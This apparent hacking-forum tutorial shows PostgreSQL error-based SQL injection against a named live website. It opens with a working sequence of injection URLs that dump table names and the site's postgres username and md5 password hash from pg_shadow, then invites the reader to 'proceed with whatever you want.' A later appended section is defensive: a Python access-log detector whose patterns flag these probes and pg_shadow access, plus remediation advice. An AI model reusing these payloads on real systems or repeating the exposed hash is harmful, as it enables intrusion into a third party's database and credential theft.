Our victim is
Code:
http://www.creatop.com.cn
Try to put a ' in the URL.
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80'
Code:
ERROR: syntax error at or near "''"
When I try to use
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=1
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=0
So I know this is either blind SQL injection or error-based SQL injection.
I try using the error-based method.
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast(version() as int)
So proceed to get the table name.
This works the same way as injecting any other vulnerable website; PostgreSQL is quite similar. In PostgreSQL error-based injection, every SQL query must be in this form:
Code:
cast((your sql command/query) as int)
Code:
ERROR: invalid input syntax for integer: "pg_type"
We try to check other table names by increasing the offset number.
So I know there are pg_user and pg_shadow tables. I try to get the data from pg_shadow.
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select usename from pg_shadow limit 1 offset 0) as int)
Code:
ERROR: invalid input syntax for integer: "postgres"
How about the passwd?
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select passwd from pg_shadow limit 1 offset 0) as int)
Code:
ERROR: invalid input syntax for integer: "md5caa5a31e69edef35ea15e2db062836a7"
Then you can proceed with whatever you want.
I will stop here. Beyond this, you need to explore it yourself.
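Every request shown above puts non-numeric text into MenuID, a parameter that should only ever hold an integer, so the whole sequence is visible in the web server's access log. The following is an added example, not part of the original post: a Python detector that flags the quote probe, the and 1=1 test, the cast(... as int) wrapper and the pg_ catalog names. It assumes a combined-format access log and that MenuID is the only integer parameter; the rule names and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: parameters this application expects to be plain integers.
INTEGER_PARAMS = {"menuid"}
# Checked only on integer parameters, where any non-digit is already anomalous.
PROBE_RULES = [
    ("quote-probe", re.compile(r"'")),
    ("boolean-probe", re.compile(r"\band\s+\d+\s*=\s*\d+", re.I)),
]
# Checked on every parameter: the cast-to-int wrapper and catalog names from the post.
EXTRACTION_RULES = [
    ("cast-error-extraction", re.compile(r"cast\s*\(.*\bas\s+int(eger)?\s*\)", re.I | re.S)),
    ("pg-catalog-access", re.compile(r"\bpg_(shadow|user|type)\b", re.I)),
]
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def inspect_request(target):
    """Return the sorted rule names that fire for one request target."""
    hits = set()
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        rules = list(EXTRACTION_RULES)
        if name.lower() in INTEGER_PARAMS and not re.fullmatch(r"\d{1,10}", value):
            hits.add("non-integer-id")
            rules += PROBE_RULES
        hits.update(rule for rule, pattern in rules if pattern.search(value))
    return sorted(hits)

def scan_log(lines):
    """Return (client, target, hits) for each access-log line that triggers a rule."""
    alerts = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if m and (hits := inspect_request(m.group(2))):
            alerts.append((m.group(1), m.group(2), hits))
    return alerts

# Constructed sample lines (documentation IP ranges), not captured traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.cfm?MenuID=80 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /search.cfm?q=O%27Brien HTTP/1.1" 200 2048',
    '203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /index.cfm?MenuID=80%27 HTTP/1.1" 500 310',
    '203.0.113.9 - - [01/Jan/2024:10:01:20 +0000] "GET /index.cfm?MenuID=80%20and%201=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:02:00 +0000] "GET /index.cfm?MenuID=80%20and%201=cast((select%20usename%20from%20pg_shadow%20limit%201%20offset%200)%20as%20int) HTTP/1.1" 500 330',
]

if __name__ == "__main__":
    for client, target, hits in scan_log(SAMPLE_LOG):
        print(client, hits, target)
```

Detection only complements the fix: bind MenuID as an integer parameter (cfqueryparam in ColdFusion), stop returning database error text to the browser, and connect with a role that is not a superuser, since pg_shadow is readable only by superusers.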
References
Code:
http://hackingexpose.blogspot.com/2009/04/postgresql-error-base-sql-injection.html
http://pentestmonkey.net/blog/postgres-sql-injection-cheat-sheet/